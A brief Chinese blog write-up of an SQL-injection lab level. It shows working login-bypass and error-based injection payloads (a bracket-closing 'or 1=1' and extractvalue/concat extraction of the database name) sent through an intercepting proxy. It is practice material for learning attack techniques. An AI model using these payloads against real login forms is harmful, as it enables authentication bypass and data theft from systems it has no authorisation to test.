赞
踩
知识点:
通过bp抓包进行尝试绕过
构造payload:username=admin'
发现了报错信息;应该是一个where username=('输入内容')
构造payload:username=a')+or1=1#
欸,又报错了,发现了更多的信息;两个参数都是('输入内容');但是为啥会报错呢??
仔细一看发现or后面没加空格
重新构造payload:username=a')+or+1=1#
成功登录了;由于没有回显,这里不能用联合注入;
构造payload:username=a')+or+exp(710)#
成功打印了错误信息;说明这里是可以进行报错注入的
构造payload:username=a')+or+extractvalue(1,concat(0x7e,database(),0x7e))#
成功获取了数据库名;
到这里就结束了;报错注入获取表名和字段信息以及敏感内容信息在前几关就展示了;这里就不再进行演示了
10
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。